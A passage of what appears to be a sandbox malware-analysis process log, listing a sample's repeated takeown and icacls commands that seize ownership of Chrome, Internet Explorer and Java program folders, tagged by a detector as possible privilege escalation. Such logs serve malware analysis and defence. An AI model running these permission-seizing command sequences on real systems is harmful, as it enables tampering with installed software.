  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\SetupMetrics" /a
  2⤵
  PID:2328
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\SetupMetrics" /grant Administrators:F
  2⤵
  PID:1084
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer" /a
  2⤵
  PID:2236
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer" /grant Administrators:F
  2⤵
  PID:2508
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\iediagcmd.exe" /a
  2⤵
  PID:2348
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\iediagcmd.exe" /grant Administrators:F
  2⤵
  PID:2204
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\de-DE" /a
  2⤵
  PID:2344
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\de-DE" /grant Administrators:F
  2⤵
  PID:1576
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\en-US" /a
  2⤵
  PID:2880
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\en-US" /grant Administrators:F
  2⤵
  PID:2128
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\es-ES" /a
  2⤵
  PID:2520
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\es-ES" /grant Administrators:F
  2⤵
  PID:2044
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\fr-FR" /a
  2⤵
  PID:2104
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\fr-FR" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:200
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\images" /a
  2⤵
  PID:2652
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\images" /grant Administrators:F
  2⤵
  PID:3020
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\it-IT" /a
  2⤵
  PID:220
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\it-IT" /grant Administrators:F
  2⤵
  PID:2420
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\ja-JP" /a
  2⤵
  PID:1048
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\ja-JP" /grant Administrators:F
  2⤵
  PID:568
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\SIGNUP" /a
  2⤵
  PID:1392
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\SIGNUP" /grant Administrators:F
  2⤵
  PID:1348
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java" /a
  2⤵
  PID:2632
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java" /grant Administrators:F
  2⤵
  PID:2604
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80" /a
  2⤵
  PID:2068
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80" /grant Administrators:F
  2⤵
  PID:1332
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\bin" /a
  2⤵
  PID:1500
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\bin" /grant Administrators:F
  2⤵
  PID:1812
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe" /a
  2⤵
  PID:216
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe" /grant Administrators:F
  2⤵
  PID:2780
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\db" /a
  2⤵
  PID:1924
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\db" /grant Administrators:F
  2⤵
  PID:1204
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\db\bin" /a
  2⤵
  PID:1656
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\db\bin" /grant Administrators:F
  2⤵
  PID:932
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\db\lib" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1016
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\db\lib" /grant Administrators:F
  2⤵
  PID:1672
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\include" /a
  2⤵
  PID:784
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\include" /grant Administrators:F
  2⤵
  PID:1012
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\include\win32" /a
  2⤵
  PID:2792
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\include\win32" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1084
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge" /a
  2⤵
  PID:268
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1880
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre" /a
  2⤵
  PID:2348
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre" /grant Administrators:F
  2⤵
  PID:1932
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin" /a
  2⤵
  PID:2852
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin" /grant Administrators:F
  2⤵
  PID:2368
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe" /a
  2⤵
  PID:2344
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe" /grant Administrators:F
  2⤵
  PID:2812
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin" /a
  2⤵
  PID:2180
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin" /grant Administrators:F
  2⤵
  PID:320
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2" /a
  2⤵
  PID:2624
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2" /grant Administrators:F
  2⤵
  PID:1208
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server" /a
  2⤵
  PID:1116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server" /grant Administrators:F
  2⤵
  PID:224
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib" /a
  2⤵
  PID:2872
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib" /grant Administrators:F
  2⤵
  PID:2828
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe" /a
  2⤵
  PID:2452
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe" /grant Administrators:F
  2⤵
  PID:1052
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64" /a
  2⤵
  PID:1432
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64" /grant Administrators:F
  2⤵
  PID:1276
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet" /a
  2⤵
  PID:2604
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet" /grant Administrators:F
  2⤵
  PID:2824
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm" /a
  2⤵
  PID:1980
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm" /grant Administrators:F
  2⤵
  PID:2068
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy" /a
  2⤵
  PID:2804
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2516
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext" /a
  2⤵
  PID:1332
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext" /grant Administrators:F
  2⤵
  PID:808
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts" /a
  2⤵
  PID:924
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts" /grant Administrators:F
  2⤵
  PID:2392
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\images" /a
  2⤵
  PID:1168
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\images" /grant Administrators:F
  2⤵
  PID:1956
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors" /a
  2⤵
  PID:1652
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors" /grant Administrators:F
  2⤵
  PID:448
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr" /a
  2⤵
  - Modifies file permissions
  PID:2236
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr" /grant Administrators:F
  2⤵
  PID:2004
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\management" /a
  2⤵
  PID:932
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\management" /grant Administrators:F
  2⤵
  PID:1656
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\security" /a
  2⤵
  PID:1640
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\security" /grant Administrators:F
  2⤵
  PID:2772
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi" /a
  2⤵
  PID:268
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi" /grant Administrators:F
  2⤵
  PID:2204
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa" /a
  2⤵
  PID:2552
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa" /grant Administrators:F
  2⤵
  PID:1616
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America" /a
  2⤵
  - Modifies file permissions
  PID:1992
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America" /grant Administrators:F
  2⤵
  PID:976
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina" /a
  2⤵
  PID:648
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina" /grant Administrators:F
  2⤵
  PID:2344
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana" /a
  2⤵
  - Modifies file permissions
  PID:1592
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana" /grant Administrators:F
  2⤵
  PID:3016
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky" /a
  2⤵
  PID:2716
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2856
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota" /a
  2⤵
  PID:320
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota" /grant Administrators:F
  2⤵
  PID:1488
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica" /a
  2⤵
  - Possible privilege escalation attempt
  PID:856
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica" /grant Administrators:F
  2⤵
  PID:1752
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia" /a
  2⤵
  PID:2436
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1452
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic" /a
  2⤵
  PID:1392
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic" /grant Administrators:F
  2⤵
  PID:2420
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia" /a
  2⤵
  PID:228
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia" /grant Administrators:F
  2⤵
  PID:344
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc" /a
  2⤵
  PID:2452
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc" /grant Administrators:F
  2⤵
  PID:2620
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe" /a
  2⤵
  PID:2416
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe" /grant Administrators:F
  2⤵
  PID:2804
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian" /a
  2⤵
  PID:1336
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian" /grant Administrators:F
  2⤵
  PID:1788
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific" /a
  2⤵
  PID:1624
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific" /grant Administrators:F
  2⤵
  PID:1660
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV" /a
  2⤵
  - Modifies file permissions
  PID:924
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV" /grant Administrators:F
  2⤵
  PID:544
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib" /a
  2⤵
  PID:2700
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib" /grant Administrators:F
  2⤵
  PID:1036
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol" /a
  2⤵
  PID:1012
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol" /grant Administrators:F
  2⤵
  PID:580
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration" /a
  2⤵
  PID:2792
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration" /grant Administrators:F
  2⤵
  PID:1152
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator" /a
  2⤵
  - Modifies file permissions
  PID:1828
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator" /grant Administrators:F
  2⤵
  PID:2528
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update" /a
  2⤵
  PID:1384
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update" /grant Administrators:F
  2⤵
  PID:3024
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins" /a
  2⤵
  PID:2772
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1880
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features" /a
  2⤵
  PID:1968
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features" /grant Administrators:F
  2⤵
  PID:976
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303" /a
  2⤵
  PID:2944
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303" /grant Administrators:F
  2⤵
  PID:1868
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303" /a
  2⤵
  PID:200
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303" /grant Administrators:F
  2⤵
  PID:2704
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303" /a
  2⤵
  PID:2344
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303" /grant Administrators:F
  2⤵
  PID:2768
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303" /a
  2⤵
  PID:1704
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303" /grant Administrators:F
  2⤵
  PID:560
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303" /a
  2⤵
  - Possible privilege escalation attempt
  PID:856
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303" /grant Administrators:F
  2⤵
  PID:1752
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303" /a
  2⤵
  PID:2280
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1452
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303" /a
  2⤵
  - Modifies file permissions
  PID:2836
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:620
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002" /a
  2⤵
  PID:1052
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002" /grant Administrators:F
  2⤵
  PID:1440
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002" /a
  2⤵
  PID:344
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2428
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033" /a
  2⤵
  PID:2288
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033" /grant Administrators:F
  2⤵
  PID:1568
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF" /a
  2⤵
  - Modifies file permissions
  PID:1336
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1788
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444" /a
  2⤵
  PID:2424
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1660
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF" /a
  2⤵
  PID:2140
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF" /grant Administrators:F
  2⤵
  PID:2640
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444" /a
  2⤵
  - Modifies file permissions
  PID:2700
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444" /grant Administrators:F
  2⤵
  PID:1036
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF" /a
  2⤵
  PID:3000
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF" /grant Administrators:F
  2⤵
  PID:580
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444" /a
  2⤵
  PID:1924
- C:\windows\system32\icacls.exe
